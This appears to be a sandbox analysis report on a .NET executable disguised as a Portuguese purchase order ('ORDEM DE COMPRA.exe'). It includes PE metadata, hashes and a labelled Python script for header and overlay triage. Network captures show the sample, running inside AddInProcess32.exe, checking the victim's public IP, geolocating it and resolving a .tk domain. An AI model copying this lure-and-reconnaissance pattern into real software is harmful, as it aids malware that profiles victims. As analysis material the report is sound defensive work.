              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.95812711732152
              TrID:
              • Win64 Executable GUI Net Framework (217006/5) 49.88%
              • Win64 Executable GUI (202006/5) 46.43%
              • Win64 Executable (generic) (12005/4) 2.76%
              • Generic Win/DOS Executable (2004/3) 0.46%
              • DOS Executable Generic (2002/1) 0.46%
              File name:ORDEM DE COMPRA.exe
              File size:528'393 bytes
              MD5:46dab257847ea9cfbbc77979323212c4
              SHA1:8cbd33b3cf519807b2c986f7fbe3daae4175595f
              SHA256:1f522609abaf12c6647c56b379cdf2c9263a845a6b4c93bac7111d0c27d68159
              SHA512:ead6cefa6e39df40bdceed5dd6fb4dad3bad18d087f3d8f6d578c1e46236a32b2728e5e206b1aa7f1b6a63fa220cc87d0867be558895690000936cffd63c0dbe
              SSDEEP:12288:PMYSxPCxJLpWDH0MVk6V8y8OY9xQCiGVb+r:0YSJCxpk3T09iCjVE
              TLSH:4CB423B263BCD5B9F4DE96B8BE5385D47B61F3C103F2AD151226891848E06047E12FB7
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...a............."...0.,................ ....@...... ....................................`................................
              Icon Hash:00928e8e8686b000
              Entrypoint:0x400000
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0xD4FC1361 [Fri Mar 26 12:30:25 2083 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:
Instruction (disassembly at the reported entry point; Entrypoint 0x400000 equals Imagebase and "Entrypoint Section" is empty, i.e. AddressOfEntryPoint is 0 because this .NET assembly has no native entry stub, so the bytes decoded below are the DOS header signature 4D 5A 90 00 03 00 00 00 04 00 00 00, not code):
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe000 | 0x93c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc510 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa52c | 0xa600 | f0764f4c3a23ac653f1a55d1bcb5f519 | False | 0.569300640060241 | data | 6.138273901734159 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe000 | 0x93c | 0xa00 | 36cc8afdfdd369c2df4e53cc97eab695 | False | 0.30234375 | data | 4.376819931086736 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xe0b8 | 0x34c | data | | | 0.5011848341232228
RT_VERSION | 0xe404 | 0x34c | data | English | United States | 0.5023696682464455
RT_MANIFEST | 0xe750 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
Language of compilation system | Country where language is spoken
English | United States
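The static table above gives three numbers worth checking together rather than one at a time: a link timestamp of 0xD4FC1361 (a date in 2083), a CLR header at RVA 0x2000, and a file of 528,393 bytes whose two sections carry only 0xa600 + 0xa00 = 45,056 bytes of raw data while the whole file has entropy 7.96 against 6.14 for .text. Everything after the last section's raw data is an overlay, and that is where the bulk of this sample lives. The following is an added example of that triage, not Joe Sandbox's code; the PE32+ image it parses is constructed in memory to mimic the header values above, with pseudo-random filler standing in for the real overlay. The one caveat it encodes: a .NET deterministic build stores a content hash in TimeDateStamp, so a far-future date on a CLR image is weak evidence by itself.

```python
"""Static PE triage: COFF timestamp plausibility, CLR header presence, and
size/entropy of the overlay after the last section. Added example; the image
below is constructed, not the report's sample."""
import hashlib
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

COFF_FMT = "<HHIIIHH"                          # IMAGE_FILE_HEADER, 20 bytes
SECTION_FMT = "<8sIIIIIIHHI"                   # IMAGE_SECTION_HEADER, 40 bytes
OPT_FMT = "<HBBIIIIIQIIHHHHHHIIIIHHQQQQII"     # PE32+ optional header up to the data directories, 112 bytes
COM_DESCRIPTOR = 14                            # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR header)
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pseudo_random_bytes(n: int, seed: bytes = b"overlay") -> bytes:
    """Deterministic high-entropy filler (SHA-256 in counter mode)."""
    out = bytearray()
    for i in range((n + 31) // 32):
        out += hashlib.sha256(seed + i.to_bytes(4, "little")).digest()
    return bytes(out[:n])


def build_pe(timestamp: int, sections, overlay: bytes) -> bytes:
    """Minimal PE32+ image. sections: (name, rva, vsize, raw_ptr, raw_size).
    Directory 14 is populated so the image parses as a .NET assembly."""
    opt = struct.pack(OPT_FMT, 0x20B, 0x30, 0, 0, 0, 0, 0, 0x2000, 0x400000,
                      0x2000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x10000, 0x200, 0,
                      2, 0x8560, 0x100000, 0x1000, 0x100000, 0x2000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[COM_DESCRIPTOR] = (0x2000, 0x48)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    coff = struct.pack(COFF_FMT, 0x8664, len(sections), timestamp, 0, 0, len(opt), 0x0022)
    hdr = struct.pack("<2s58xI", b"MZ", 0x40) + b"PE\0\0" + coff + opt
    for name, rva, vsize, ptr, size in sections:
        hdr += struct.pack(SECTION_FMT, name.ljust(8, b"\0"), vsize, rva, size, ptr, 0, 0, 0, 0, 0x60000020)
    raw_end = max(ptr + size for _, _, _, ptr, size in sections)
    image = bytearray(raw_end)                 # section bodies stay zero-filled
    image[:len(hdr)] = hdr
    return bytes(image) + overlay


def triage(data: bytes, now=None) -> dict:
    """Parse the headers and return what a first-pass analyst wants to know."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff_off = e_lfanew + 4
    _, nsec, ts, _, _, opt_size, _ = struct.unpack_from(COFF_FMT, data, coff_off)
    opt_off = coff_off + 20
    magic = struct.unpack_from("<H", data, opt_off)[0]
    dir_base = opt_off + (112 if magic == 0x20B else 96)   # PE32+ vs PE32
    clr_rva, _ = struct.unpack_from("<II", data, dir_base + 8 * COM_DESCRIPTOR)
    sections, raw_end = [], 0
    for i in range(nsec):
        name, vsize, rva, rsize, rptr = struct.unpack_from(SECTION_FMT, data, opt_off + opt_size + 40 * i)[:5]
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), rva, vsize, rptr, rsize))
        raw_end = max(raw_end, rptr + rsize)
    overlay = data[raw_end:]                   # everything past the last section's raw data
    ts_utc = EPOCH + timedelta(seconds=ts)
    now = now or datetime.now(timezone.utc)
    findings = []
    if ts_utc.year < 1990 or ts_utc > now + timedelta(days=1):
        findings.append(f"link timestamp 0x{ts:08X} ({ts_utc:%Y-%m-%d}) is not a plausible build date")
        if clr_rva:
            findings.append("CLR header present: deterministic .NET builds put a content hash in this field, so the timestamp alone is weak evidence")
    ov_entropy = shannon_entropy(overlay)
    if len(overlay) > len(data) // 2 and ov_entropy > 7.0:
        findings.append(f"{len(overlay)} bytes of overlay with entropy {ov_entropy:.2f}: a packed or encrypted payload follows the sections")
    return {"timestamp": ts, "timestamp_utc": ts_utc, "is_dotnet": bool(clr_rva),
            "sections": sections, "overlay_offset": raw_end, "overlay_size": len(overlay),
            "overlay_entropy": ov_entropy, "findings": findings}


# Constructed to match the report: .text RVA 0x2000 / raw 0xa600, .rsrc RVA 0xe000 /
# raw 0xa00, timestamp 0xD4FC1361, 528,393 bytes overall. Raw pointers are assumed.
SAMPLE = build_pe(
    0xD4FC1361,
    [(b".text", 0x2000, 0xA52C, 0x200, 0xA600), (b".rsrc", 0xE000, 0x93C, 0xA800, 0xA00)],
    pseudo_random_bytes(528_393 - 0xB200),
)

if __name__ == "__main__":
    report = triage(SAMPLE)
    for key in ("timestamp_utc", "is_dotnet", "overlay_offset", "overlay_size", "overlay_entropy"):
        print(f"{key}: {report[key]}")
    for finding in report["findings"]:
        print("-", finding)
```

Run against a real file, `triage(open(path, "rb").read())` gives the overlay offset to carve from; on this sample's layout the overlay starts at 0xb200 and accounts for more than 90% of the file, which is what drives the 7.96 whole-file entropy while both sections stay well below it.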
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              May 23, 2024 15:13:01.594975948 CEST | 58170 | 53 | 192.168.2.6 | 1.1.1.1
              May 23, 2024 15:13:01.603986979 CEST | 53 | 58170 | 1.1.1.1 | 192.168.2.6
              May 23, 2024 15:13:03.108026028 CEST | 50410 | 53 | 192.168.2.6 | 1.1.1.1
              May 23, 2024 15:13:03.141047955 CEST | 53 | 50410 | 1.1.1.1 | 192.168.2.6
              May 23, 2024 15:13:15.664241076 CEST | 56221 | 53 | 192.168.2.6 | 1.1.1.1
              May 23, 2024 15:13:15.977629900 CEST | 53 | 56221 | 1.1.1.1 | 192.168.2.6
              May 23, 2024 15:13:16.555351973 CEST | 53 | 51016 | 1.1.1.1 | 192.168.2.6
              May 23, 2024 15:13:30.783941984 CEST | 53 | 58134 | 162.159.36.2 | 192.168.2.6
              May 23, 2024 15:13:31.281265020 CEST | 56366 | 53 | 192.168.2.6 | 1.1.1.1
              May 23, 2024 15:13:31.340416908 CEST | 53 | 56366 | 1.1.1.1 | 192.168.2.6
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              May 23, 2024 15:13:01.594975948 CEST | 192.168.2.6 | 1.1.1.1 | 0x4ade | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:03.108026028 CEST | 192.168.2.6 | 1.1.1.1 | 0x9cb4 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:15.664241076 CEST | 192.168.2.6 | 1.1.1.1 | 0xeb07 | Standard query (0) | scratchdreams.tk | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:31.281265020 CEST | 192.168.2.6 | 1.1.1.1 | 0x5ed1 | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              May 23, 2024 15:13:01.603986979 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ade | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
              May 23, 2024 15:13:01.603986979 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ade | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:01.603986979 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ade | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:01.603986979 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ade | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:01.603986979 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ade | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:01.603986979 CEST | 1.1.1.1 | 192.168.2.6 | 0x4ade | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:03.141047955 CEST | 1.1.1.1 | 192.168.2.6 | 0x9cb4 | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:03.141047955 CEST | 1.1.1.1 | 192.168.2.6 | 0x9cb4 | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:15.977629900 CEST | 1.1.1.1 | 192.168.2.6 | 0xeb07 | No error (0) | scratchdreams.tk | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:15.977629900 CEST | 1.1.1.1 | 192.168.2.6 | 0xeb07 | No error (0) | scratchdreams.tk | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
              May 23, 2024 15:13:31.340416908 CEST | 1.1.1.1 | 192.168.2.6 | 0x5ed1 | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
              • reallyfreegeoip.org
              • scratchdreams.tk
              • checkip.dyndns.org
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.6 | 49699 | 132.226.8.169 | 80 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              May 23, 2024 15:13:01.645076036 CEST | 151 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              May 23, 2024 15:13:02.471041918 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:02 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 961174ec75d60b82039f4908a4b20487
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
              May 23, 2024 15:13:02.551199913 CEST | 127 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:03.030545950 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:02 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 9b4f563993276c84becb58e0b37bbfe2
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
              May 23, 2024 15:13:03.827977896 CEST | 127 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:04.173777103 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:04 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 658981098ac4f899913755749fa58e44
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              1 | 192.168.2.6 | 49704 | 132.226.8.169 | 80 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              May 23, 2024 15:13:05.233206987 CEST | 127 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:06.155486107 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:06 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 6586d3faf0ccfd491a96bf3639dea32a
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              2 | 192.168.2.6 | 49709 | 132.226.8.169 | 80 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              May 23, 2024 15:13:06.915304899 CEST | 127 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:07.840574980 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:07 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 738451cdb053429ebb63a903d2eebcf9
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              3 | 192.168.2.6 | 49712 | 132.226.8.169 | 80 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              May 23, 2024 15:13:08.565377951 CEST | 127 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              May 23, 2024 15:13:09.408503056 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:09 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 9dec79afed4e2c751404b81dab7e41fb
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              4 | 192.168.2.6 | 49714 | 132.226.8.169 | 80 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              May 23, 2024 15:13:10.206820011 CEST | 151 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              May 23, 2024 15:13:10.965600014 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:10 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 21ecc224ab0aa588190aea359cb3ba6e
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              5 | 192.168.2.6 | 49716 | 132.226.8.169 | 80 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              May 23, 2024 15:13:11.989902973 CEST | 151 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              May 23, 2024 15:13:12.891972065 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:12 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 80d2a7d946e85a627573387c5a4fb27e
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              6 | 192.168.2.6 | 49718 | 132.226.8.169 | 80 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              May 23, 2024 15:13:13.725131035 CEST | 151 | OUT | GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              May 23, 2024 15:13:14.962764978 CEST | 321 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:14 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
              X-Request-ID: 8542d5ac19c681798a67eb2e49904b0f
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.6 | 49700 | 188.114.97.3 | 443 | 6976 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-05-23 13:13:03 UTC | 85 | OUT | GET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              Connection: Keep-Alive
              2024-05-23 13:13:03 UTC | 710 | IN | HTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:03 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15044
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gdqcT1aX0ULlZC%2Fz5yI2EBZxuLcVSMGlvc6oq4HNgloPPJFOcs9vhCzJm6bpPBTAoqKUnIfQNg8WzY%2Be4DF2ApdbUrVYoV0p3pEP2jjPwl6%2Bx%2F3OKDZabolMO%2FiuCUtBmyrPk350"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d167e774299-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:03 UTC | 341 | IN | Data Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:03 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
